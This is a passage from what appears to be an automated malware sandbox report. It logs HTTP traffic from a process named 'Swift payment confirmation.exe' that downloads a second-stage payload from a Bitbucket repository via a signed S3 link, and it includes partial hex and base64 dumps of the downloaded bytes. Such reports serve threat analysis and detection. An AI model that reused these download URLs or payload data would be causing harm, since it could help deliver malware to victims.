                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Age: 0
                                                                              X-Cache: MISS
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: deec59e3d6f34e328661d9925ec7ff9a
                                                                              Atl-Request-Id: deec59e3-d6f3-4e32-8661-d9925ec7ff9a
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Server-Timing: atl-edge;dur=170,atl-edge-internal;dur=3,atl-edge-upstream;dur=168,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.54970952.217.102.2284431968C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 08:07:03 UTC1293OUTGET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJew [TRUNCATED]
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                              2024-10-31 08:07:03 UTC544INHTTP/1.1 200 OK
                                                                              x-amz-id-2: bVdg6i5bY44dG/cvat9yhPnpC2yuB4UqCqPVwrgeur4M0VdUqu7qO8gO1PqDN/4G0iBWDINfMGw=
                                                                              x-amz-request-id: X5JQXR8S3W0KCAEQ
                                                                              Date: Thu, 31 Oct 2024 08:07:04 GMT
                                                                              Last-Modified: Sun, 27 Oct 2024 21:53:04 GMT
                                                                              ETag: "271a5d4a7e33f8c487190f127c5e2f43"
                                                                              x-amz-server-side-encryption: AES256
                                                                              x-amz-version-id: iLAYpg_EnWYHrKq5hXoEQZgnva5dDdpK
                                                                              Content-Disposition: attachment; filename="233_Hherfkswbzh"
                                                                              Accept-Ranges: bytes
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 383260
                                                                              Server: AmazonS3
                                                                              Connection: close
                                                                              2024-10-31 08:07:03 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 50 45 52 45 6b 47 53 55 50 4a 42 55 59 46 79 49 69 4a 79 45 68 45 78 77 55 45 42 4d 51 47 43 63 6d 49 78 38 62 4a 51 34 65 46 79 4d 65 48 78 73 68 48 42 59 63 4a 78 63 6e 44 69 41 4f 46 78 41 6e 49 69 45 6e 46 52 4d 54 46 79 45 4f 46 52 59 65 48 78 67 69 4a 79 63 68 48 68 6f 4f 49 42 38 64 48 52 6b 53 4a 52 63 52 49 43 51 55 4a 79 49 6e 47 79 55 4f 47 68 45 5a 4a 78 45 69 4a 68 71 6d 72 71 56 5a 49 36 65 78 53 31 4d 56 45 68 38 54 47 43 41 6b 44 79 63 56 70 71 36 6c 57 53 4f 6e 73 55 75 36 74 4c 53 6e 72 4b 43 36 70 37 43 7a 73 71 57 6c 6f 71 53 6b 74 71 2b 33 75 37 61 37 73 36 4b 68 70 71 71 75 6f 4c 6d 70 73 71 61 70 71 71 36 6b 72 37 47 76 6f 72 4b 69 75 61 75 35 73 72 75 69 70 61 53 69 73 4c 61 32 73 71 53 35 73 4c 47
                                                                              Data Ascii: pq6lWSOnsUsPEREkGSUPJBUYFyIiJyEhExwUEBMQGCcmIx8bJQ4eFyMeHxshHBYcJxcnDiAOFxAnIiEnFRMTFyEOFRYeHxgiJychHhoOIB8dHRkSJRcRICQUJyInGyUOGhEZJxEiJhqmrqVZI6exS1MVEh8TGCAkDycVpq6lWSOnsUu6tLSnrKC6p7CzsqWloqSktq+3u7a7s6KhpqquoLmpsqapqq6kr7GvorKiuau5sruipaSisLa2sqS5sLG
                                                                              2024-10-31 08:07:03 UTC480INData Raw: 33 70 67 56 64 78 6d 69 4a 61 77 4e 77 62 50 4c 6c 64 67 6c 6b 45 79 67 6d 4e 4b 70 65 38 33 66 51 64 6e 32 34 46 4d 56 37 44 30 58 78 78 43 4f 53 6b 42 45 74 56 65 62 4c 56 4b 6b 35 70 75 44 33 52 31 48 45 76 65 37 68 66 2f 4f 44 6e 47 6f 48 66 76 65 67 75 71 53 52 71 4b 7a 4b 53 44 64 35 30 7a 51 47 37 68 50 74 71 63 6b 79 72 4a 55 34 4e 61 4a 72 63 6b 64 53 6a 49 61 2b 58 6c 58 31 31 6f 6b 31 38 31 73 32 71 6a 35 52 4d 72 4c 74 4b 54 7a 51 75 63 4b 38 46 37 38 75 59 5a 36 37 73 4a 43 65 70 39 67 74 47 7a 75 6f 58 6a 63 63 4c 55 5a 33 32 41 39 56 64 65 65 54 2f 61 61 2b 72 38 61 56 6d 34 41 4b 37 62 71 30 69 71 68 54 50 46 61 43 6c 35 63 76 6e 2b 6d 55 34 6d 43 37 77 34 4e 43 62 64 75 39 7a 6c 31 33 38 51 54 43 4c 34 4c 36 77 5a 68 2b 49 43 6e 74 43 58
                                                                              Data Ascii: 3pgVdxmiJawNwbPLldglkEygmNKpe83fQdn24FMV7D0XxxCOSkBEtVebLVKk5puD3R1HEve7hf/ODnGoHfveguqSRqKzKSDd50zQG7hPtqckyrJU4NaJrckdSjIa+XlX11ok181s2qj5RMrLtKTzQucK8F78uYZ67sJCep9gtGzuoXjccLUZ32A9VdeeT/aa+r8aVm4AK7bq0iqhTPFaCl5cvn+mU4mC7w4NCbdu9zl138QTCL4L6wZh+ICntCX
                                                                              2024-10-31 08:07:03 UTC16384INData Raw: 53 47 64 4a 45 54 56 56 45 72 70 30 53 74 52 56 75 50 66 49 7a 6e 30 79 72 58 68 72 44 37 7a 6d 38 6a 61 49 4c 35 44 56 56 4b 44 67 52 62 53 76 58 4e 4c 4d 77 41 39 61 33 48 62 37 46 30 6d 44 5a 6e 6e 44 75 37 32 56 4f 6a 36 5a 74 37 47 65 7a 41 4b 70 61 38 36 33 65 35 6c 32 65 36 2f 31 55 75 70 4c 50 36 2b 48 58 4a 30 46 64 64 4e 58 4c 70 7a 6d 6a 5a 55 70 67 72 63 59 6e 64 59 73 30 6c 4b 4e 2f 30 4f 6c 42 64 75 6a 6d 53 39 31 52 45 55 63 34 43 73 38 66 43 4b 79 36 66 6b 32 77 6f 6e 4c 56 77 4f 4e 78 55 63 6f 4a 4e 79 51 57 53 64 68 61 41 4e 43 70 34 62 35 64 5a 58 47 37 31 33 57 4c 6f 44 42 4f 70 6e 75 43 35 33 6e 73 76 73 6b 47 43 79 6c 37 38 32 56 36 43 54 48 54 72 32 2f 32 39 2b 64 71 32 71 47 45 64 67 65 65 4e 4d 46 61 79 45 50 4e 48 4d 57 59 72 73
                                                                              Data Ascii: SGdJETVVErp0StRVuPfIzn0yrXhrD7zm8jaIL5DVVKDgRbSvXNLMwA9a3Hb7F0mDZnnDu72VOj6Zt7GezAKpa863e5l2e6/1UupLP6+HXJ0FddNXLpzmjZUpgrcYndYs0lKN/0OlBdujmS91REUc4Cs8fCKy6fk2wonLVwONxUcoJNyQWSdhaANCp4b5dZXG713WLoDBOpnuC53nsvskGCyl782V6CTHTr2/29+dq2qGEdgeeNMFayEPNHMWYrs
                                                                              2024-10-31 08:07:03 UTC1024INData Raw: 6a 48 64 58 64 38 35 71 57 6c 48 68 2f 66 2b 59 2f 30 4b 2b 35 78 36 6a 6e 36 4f 4a 71 32 68 79 51 55 45 71 74 4b 7a 71 4a 49 2b 56 69 2b 47 62 4a 75 67 6f 7a 4a 6a 5a 32 59 42 55 46 61 45 36 4a 56 65 55 77 59 6d 72 77 35 6a 36 7a 55 62 36 57 7a 6b 59 52 32 56 4a 61 41 71 76 6f 6a 31 36 38 6e 36 31 6e 46 69 34 7a 62 47 66 68 32 45 64 68 44 7a 2f 63 4f 6f 6f 63 6d 6f 4e 4f 42 66 50 33 75 6e 37 62 72 45 46 4c 6f 74 75 79 53 70 69 56 65 33 2b 45 54 52 34 4d 33 6b 43 4a 74 78 56 78 65 36 6b 35 59 53 62 65 56 4d 54 6c 74 66 31 33 44 57 6b 79 76 6e 5a 45 45 77 2f 51 4c 54 31 4c 38 65 34 5a 6f 37 6c 68 6f 79 30 68 62 73 4e 59 6a 42 4d 76 4d 53 45 49 75 49 50 56 4e 52 64 39 4f 33 2f 6a 6d 4c 4e 4d 44 61 4b 53 54 6d 53 46 73 71 66 42 7a 50 51 6b 33 47 68 41 69 37
                                                                              Data Ascii: jHdXd85qWlHh/f+Y/0K+5x6jn6OJq2hyQUEqtKzqJI+Vi+GbJugozJjZ2YBUFaE6JVeUwYmrw5j6zUb6WzkYR2VJaAqvoj168n61nFi4zbGfh2EdhDz/cOoocmoNOBfP3un7brEFLotuySpiVe3+ETR4M3kCJtxVxe6k5YSbeVMTltf13DWkyvnZEEw/QLT1L8e4Zo7lhoy0hbsNYjBMvMSEIuIPVNRd9O3/jmLNMDaKSTmSFsqfBzPQk3GhAi7
                                                                              2024-10-31 08:07:04 UTC16384INData Raw: 78 57 56 6b 71 54 4f 63 72 39 73 53 43 50 78 58 33 51 6a 2f 61 47 34 7a 54 50 73 46 73 4f 63 75 6a 50 6a 55 45 61 48 45 76 42 65 76 75 30 57 33 59 48 77 45 54 69 6e 41 50 41 41 74 46 6e 52 34 35 65 52 46 4c 63 32 36 6a 61 54 44 49 66 59 51 43 44 77 55 79 73 6c 46 48 48 78 42 51 35 48 76 6b 5a 43 75 6b 66 69 74 42 5a 43 38 69 75 35 79 6d 59 39 35 4b 33 69 46 47 74 57 78 45 70 45 6c 59 4b 65 31 69 6d 61 6e 6a 68 61 50 74 36 73 58 42 57 4b 45 58 68 57 7a 4c 77 54 33 41 52 52 70 6b 52 35 36 72 2b 31 4a 72 41 66 32 56 75 62 38 79 6e 50 61 44 77 4e 47 50 76 6c 6d 38 4f 51 4e 49 79 75 56 62 61 48 30 46 51 59 57 38 55 44 54 4d 50 58 61 48 75 35 75 59 30 67 4c 4c 62 33 71 50 43 6c 53 2f 44 34 4b 32 7a 48 2f 33 75 2f 39 75 30 33 49 77 67 6c 43 6c 4c 51 69 42 62 39
                                                                              Data Ascii: xWVkqTOcr9sSCPxX3Qj/aG4zTPsFsOcujPjUEaHEvBevu0W3YHwETinAPAAtFnR45eRFLc26jaTDIfYQCDwUyslFHHxBQ5HvkZCukfitBZC8iu5ymY95K3iFGtWxEpElYKe1imanjhaPt6sXBWKEXhWzLwT3ARRpkR56r+1JrAf2Vub8ynPaDwNGPvlm8OQNIyuVbaH0FQYW8UDTMPXaHu5uY0gLLb3qPClS/D4K2zH/3u/9u03IwglClLQiBb9
                                                                              2024-10-31 08:07:04 UTC1024INData Raw: 2f 57 57 50 4f 36 43 68 58 4d 6e 4c 34 72 57 37 2b 79 4f 78 36 4a 75 79 75 57 55 52 46 70 67 4a 46 39 41 56 6d 6f 45 36 6e 46 37 76 47 48 71 5a 64 36 4d 49 74 5a 2b 35 74 56 62 75 63 38 6e 2f 70 4c 6d 59 4c 4e 37 38 56 64 70 69 44 6c 7a 38 38 6f 38 59 39 6b 59 66 4e 56 50 63 4b 76 2b 55 7a 39 52 74 53 6b 53 34 58 49 6d 4b 44 66 52 6f 56 65 41 63 61 4a 30 36 59 61 2f 43 38 50 65 31 74 69 33 74 35 66 69 58 77 2f 76 77 76 6d 4b 52 4d 30 45 77 53 48 4a 6c 71 73 6d 4d 46 73 59 6d 63 56 66 4c 52 76 4e 63 4d 61 71 79 58 66 35 72 6a 4d 31 63 39 62 39 30 6d 55 38 44 36 53 38 6c 41 4b 53 71 38 6f 39 56 62 68 6a 35 44 50 32 4a 49 72 43 73 39 70 46 51 67 6f 35 5a 77 68 56 62 59 34 45 69 54 44 32 56 55 32 6b 58 79 76 43 62 77 34 53 61 59 45 30 36 46 4e 6f 47 45 37 67
                                                                              Data Ascii: /WWPO6ChXMnL4rW7+yOx6JuyuWURFpgJF9AVmoE6nF7vGHqZd6MItZ+5tVbuc8n/pLmYLN78VdpiDlz88o8Y9kYfNVPcKv+Uz9RtSkS4XImKDfRoVeAcaJ06Ya/C8Pe1ti3t5fiXw/vwvmKRM0EwSHJlqsmMFsYmcVfLRvNcMaqyXf5rjM1c9b90mU8D6S8lAKSq8o9Vbhj5DP2JIrCs9pFQgo5ZwhVbY4EiTD2VU2kXyvCbw4SaYE06FNoGE7g
                                                                              2024-10-31 08:07:04 UTC1795INData Raw: 71 34 61 4b 49 4e 30 49 53 73 55 41 62 54 54 52 57 6f 66 48 75 6c 77 47 2f 58 76 53 4d 4c 66 6c 6c 4c 55 63 61 79 2f 45 51 69 33 55 55 56 4f 4b 47 68 2f 62 32 4c 34 6d 64 30 64 37 68 6e 39 53 55 52 52 42 4a 46 47 50 4a 4b 68 68 54 75 58 67 58 6f 49 4e 76 31 64 44 53 6a 6b 77 47 42 34 4e 37 72 72 44 49 67 4c 6b 4c 42 63 72 4e 6d 79 76 58 46 4e 47 72 30 63 6b 39 2b 50 45 42 4f 4a 6b 46 57 4a 50 6f 63 37 6f 37 53 6a 78 77 70 48 68 6d 63 6d 6d 72 36 37 51 65 35 6a 57 57 31 75 65 63 45 4e 56 76 45 64 30 42 35 6f 38 77 51 75 6b 6d 30 31 78 66 71 79 46 4c 58 39 4a 31 37 34 35 50 69 4d 43 75 5a 73 78 56 74 2b 39 79 6e 45 46 7a 33 42 38 64 45 68 75 45 78 6a 41 45 4f 59 73 64 47 53 43 66 66 6e 52 47 6b 2f 6e 7a 54 31 6c 57 72 2b 42 39 30 65 78 79 64 44 5a 68 36 6e
                                                                              Data Ascii: q4aKIN0ISsUAbTTRWofHulwG/XvSMLfllLUcay/EQi3UUVOKGh/b2L4md0d7hn9SURRBJFGPJKhhTuXgXoINv1dDSjkwGB4N7rrDIgLkLBcrNmyvXFNGr0ck9+PEBOJkFWJPoc7o7SjxwpHhmcmmr67Qe5jWW1uecENVvEd0B5o8wQukm01xfqyFLX9J1745PiMCuZsxVt+9ynEFz3B8dEhuExjAEOYsdGSCffnRGk/nzT1lWr+B90exydDZh6n
                                                                              2024-10-31 08:07:04 UTC16384INData Raw: 6e 67 4e 4e 57 6e 6e 77 46 67 63 71 4c 73 63 4e 2f 61 4d 77 38 78 68 48 6f 78 57 4e 52 66 4f 6c 64 71 42 4c 44 74 48 54 52 77 56 6f 35 4e 4d 66 74 2f 4a 54 2f 6a 4a 79 72 57 68 72 54 49 71 78 2f 44 5a 39 46 37 4e 32 6e 4d 56 41 33 79 74 53 78 68 43 52 52 69 6b 42 36 37 31 56 56 72 50 54 73 4e 64 45 63 57 4c 43 78 47 79 6e 75 37 74 5a 68 74 47 62 7a 75 2b 39 7a 58 35 44 4a 5a 2b 78 70 4d 56 5a 54 50 50 73 74 4f 62 70 39 53 47 47 64 4c 62 57 61 67 6e 42 75 63 45 38 57 69 58 6a 75 43 7a 4a 57 65 5a 41 38 69 56 4b 6b 42 6e 34 34 77 4e 44 70 39 4c 4d 32 41 78 58 5a 6a 52 6d 37 79 65 5a 75 73 53 31 4b 4d 49 4c 74 30 47 4c 67 51 6f 55 30 49 47 59 2b 36 4f 67 74 64 6a 52 6c 57 4c 6a 77 48 2b 6e 52 63 31 51 4b 76 4e 61 45 55 44 4e 38 30 69 64 7a 53 39 6b 36 2f 38
                                                                              Data Ascii: ngNNWnnwFgcqLscN/aMw8xhHoxWNRfOldqBLDtHTRwVo5NMft/JT/jJyrWhrTIqx/DZ9F7N2nMVA3ytSxhCRRikB671VVrPTsNdEcWLCxGynu7tZhtGbzu+9zX5DJZ+xpMVZTPPstObp9SGGdLbWagnBucE8WiXjuCzJWeZA8iVKkBn44wNDp9LM2AxXZjRm7yeZusS1KMILt0GLgQoU0IGY+6OgtdjRlWLjwH+nRc1QKvNaEUDN80idzS9k6/8
                                                                              2024-10-31 08:07:04 UTC1024INData Raw: 64 61 39 70 69 68 55 56 78 45 4f 4f 6d 4e 54 47 77 67 5a 72 50 6b 46 49 73 6e 68 74 50 4b 6e 4f 55 4e 57 79 32 73 55 6a 32 6f 32 56 4c 4a 34 48 69 47 31 33 49 6a 38 4b 67 54 79 61 6a 31 36 63 4f 30 56 5a 61 63 52 79 2b 45 4e 43 7a 53 6b 4e 58 51 32 4d 68 79 6a 43 39 32 58 6a 69 36 42 50 37 59 69 75 56 4b 76 48 59 34 46 69 63 4c 73 79 45 6f 69 63 62 2f 67 74 68 50 35 52 54 76 62 64 4f 63 68 65 33 2b 30 4c 61 41 61 4c 59 4b 6e 41 6d 77 5a 47 43 6d 6a 46 41 58 51 36 2b 50 61 58 73 31 6e 76 54 6c 45 45 65 42 51 30 6d 47 66 32 68 46 61 54 6d 65 43 49 35 72 78 71 4a 41 30 2f 6f 71 52 66 54 62 4c 73 63 45 76 6f 58 4f 58 43 64 76 4d 73 54 41 2f 47 52 53 4e 33 51 44 65 56 4e 6f 5a 39 4e 36 48 57 46 62 33 4c 45 2b 72 39 55 38 59 6a 67 56 53 53 4b 56 4c 48 67 2f 72
                                                                              Data Ascii: da9pihUVxEOOmNTGwgZrPkFIsnhtPKnOUNWy2sUj2o2VLJ4HiG13Ij8KgTyaj16cO0VZacRy+ENCzSkNXQ2MhyjC92Xji6BP7YiuVKvHY4FicLsyEoicb/gthP5RTvbdOche3+0LaAaLYKnAmwZGCmjFAXQ6+PaXs1nvTlEEeBQ0mGf2hFaTmeCI5rxqJA0/oqRfTbLscEvoXOXCdvMsTA/GRSN3QDeVNoZ9N6HWFb3LE+r9U8YjgVSSKVLHg/r
                                                                              2024-10-31 08:07:04 UTC16384INData Raw: 69 61 76 71 73 4e 49 58 55 73 4e 71 70 59 48 49 42 5a 7a 62 6f 36 58 66 7a 52 54 39 4c 6e 68 68 4e 33 63 52 4b 4f 43 4a 70 76 76 69 56 48 77 42 2b 76 6b 67 6d 48 6b 6b 7a 39 4b 41 2f 39 62 38 67 69 45 55 71 76 5a 48 34 47 41 69 6d 7a 6a 55 54 49 79 42 47 73 48 4a 2b 39 32 77 53 7a 5a 4b 58 2b 52 58 32 63 76 4f 6b 50 74 52 62 64 79 6c 6c 44 38 53 70 33 32 48 66 42 7a 46 79 63 4a 6d 7a 4f 49 65 64 39 45 72 4a 51 4e 33 42 4a 61 78 36 73 55 72 70 43 4e 7a 55 77 31 6b 70 6b 4a 50 62 62 32 6b 57 32 64 65 33 36 38 62 4b 45 55 36 38 48 74 6c 6a 6c 4d 38 56 48 38 67 69 75 6e 5a 34 50 39 75 45 52 61 57 67 7a 73 69 31 75 30 6d 34 67 46 44 72 62 36 35 59 2b 4e 2f 53 5a 50 51 79 4a 7a 30 4f 37 77 45 68 53 68 63 4f 53 63 36 74 30 6f 49 6d 6d 74 74 73 4f 70 43 37 64 74
                                                                              Data Ascii: iavqsNIXUsNqpYHIBZzbo6XfzRT9LnhhN3cRKOCJpvviVHwB+vkgmHkkz9KA/9b8giEUqvZH4GAimzjUTIyBGsHJ+92wSzZKX+RX2cvOkPtRbdyllD8Sp32HfBzFycJmzOIed9ErJQN3BJax6sUrpCNzUw1kpkJPbb2kW2de368bKEU68HtljlM8VH8giunZ4P9uERaWgzsi1u0m4gFDrb65Y+N/SZPQyJz0O7wEhShcOSc6t0oImmttsOpC7dt


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.549711185.166.143.504431968C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 08:07:06 UTC187OUTGET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bitbucket.org
                                                                              2024-10-31 08:07:06 UTC5307INHTTP/1.1 302 Found
                                                                              Date: Thu, 31 Oct 2024 08:07:06 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Server: AtlassianEdge
                                                                              Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgt [TRUNCATED]
                                                                              Expires: Thu, 31 Oct 2024 08:07:06 GMT
                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                              X-Used-Mesh: False
                                                                              Vary: Accept-Language, Origin
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: 5844cf8c9e13
                                                                              X-Version: 6cbe3b68176f
                                                                              X-Static-Version: 6cbe3b68176f
                                                                              X-Request-Count: 2755
                                                                              X-Render-Time: 0.04441976547241211
                                                                              X-B3-Traceid: 1643f8d171c14af99997d214e75a6561
                                                                              X-B3-Spanid: 232f25aaae8b270f
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io e [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 999043.023
                                                                              X-Usage-Request-Cost: 942.17
                                                                              X-Usage-User-Time: 0.028265
                                                                              X-Usage-System-Time: 0.000000
                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Age: 0
                                                                              X-Cache: MISS
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: 1643f8d171c14af99997d214e75a6561
                                                                              Atl-Request-Id: 1643f8d1-71c1-4af9-9997-d214e75a6561
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=2,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.5497123.5.29.824431968C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 08:07:07 UTC1293OUTGET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJew [TRUNCATED]
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                              2024-10-31 08:07:07 UTC564INHTTP/1.1 200 OK
                                                                              x-amz-id-2: YQF1Mpb0oxWaAdbK7gqfUgJkaB+ytoqL3BOd6ZVnbssJyu7rXpRDyz8ciFah4qR0JSxxrvFVy/ka+l1s4KdRyQavU7lM1TvF
                                                                              x-amz-request-id: K2WZT6C5SKG9SHF8
                                                                              Date: Thu, 31 Oct 2024 08:07:08 GMT
                                                                              Last-Modified: Sun, 27 Oct 2024 21:53:04 GMT
                                                                              ETag: "271a5d4a7e33f8c487190f127c5e2f43"
                                                                              x-amz-server-side-encryption: AES256
                                                                              x-amz-version-id: iLAYpg_EnWYHrKq5hXoEQZgnva5dDdpK
                                                                              Content-Disposition: attachment; filename="233_Hherfkswbzh"
                                                                              Accept-Ranges: bytes
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 383260
                                                                              Server: AmazonS3
                                                                              Connection: close
